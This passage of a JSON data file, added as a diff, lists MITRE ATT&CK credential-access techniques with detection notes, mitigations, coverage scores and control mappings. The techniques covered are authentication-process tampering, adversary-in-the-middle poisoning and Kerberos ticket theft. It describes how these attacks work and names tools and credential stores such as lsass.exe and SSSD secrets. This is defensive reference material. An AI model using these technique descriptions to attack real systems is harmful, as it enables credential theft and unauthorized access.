events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "cumulative_score": 0.7152835994590475, + "adjusted_score": 0.7152835994590475, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "5.2" + ], + "nist_controls": [ + "CA-7", + "IA-5", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1556", + "name": "Modify Authentication Process", + "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", + "url": "https://attack.mitre.org/techniques/T1556", + "tactics": [ + "Credential Access", + "Defense Evasion", + "Persistence" + ], + "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Creation", + "File: File Modification", + "Logon Session: Logon Session Creation", + "Module: Module Load", + "Process: OS API Execution", + "Process: Process Access", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1556.001", + "name": "Modify Authentication Process: Domain Controller Authentication", + "url": "https://attack.mitre.org/techniques/T1556/001", + "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", + "detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ] + }, + { + "tid": "T1556.002", + "name": "Modify Authentication Process: Password Filter DLL", + "url": "https://attack.mitre.org/techniques/T1556/002", + "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)", + "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1556.003", + "name": "Modify Authentication Process: Pluggable Authentication Modules", + "url": "https://attack.mitre.org/techniques/T1556/003", + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", + "detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1556.004", + "name": "Modify Authentication Process: Network Device Authentication", + "url": "https://attack.mitre.org/techniques/T1556/004", + "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)", + "detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 0.551752380952381, + "adjusted_score": 0.551752380952381, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.6,4.1,4.7,5.1,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,12.2,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-20", + "AC-3", + "AC-5", + "AC-6", + "AC-7", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-5", + "SC-39", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1557", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.", + "url": "https://attack.mitre.org/techniques/T1557", + "tactics": [ + "Collection", + "Credential Access" + ], + "detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1557.001", + "name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay", + "url": "https://attack.mitre.org/techniques/T1557/001", + "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ] + }, + { + "tid": "T1557.002", + "name": "Adversary-in-the-Middle: ARP Cache Poisoning", + "url": "https://attack.mitre.org/techniques/T1557/002", + "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n", + "detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 1.2308892259161908, + "adjusted_score": 1.2308892259161908, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.12,4.1,4.2,4.4,4.6,4.8,7.6,7.7,12.2,12.8,13.3,13.4,13.8,14.2,14.6,16.8,18.2,18.3,18.5,16.10,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-20", + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "RA-5", + "SC-23", + "SC-4", + "SC-46", + "SC-7", + "SC-8", + "SI-10", + "SI-12", + "SI-15", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n", + "url": "https://attack.mitre.org/techniques/T1558", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Credential Request", + "Command: Command Execution", + "File: File Access", + "Logon Session: Logon Session Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1558.001", + "name": "Steal or Forge Kerberos Tickets: Golden Ticket", + "url": "https://attack.mitre.org/techniques/T1558/001", + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1558.002", + "name": "Steal or Forge Kerberos Tickets: Silver Ticket", + "url": "https://attack.mitre.org/techniques/T1558/002", + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1558.003", + "name": "Steal or Forge Kerberos Tickets: Kerberoasting", + "url": "https://attack.mitre.org/techniques/T1558/003", + "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 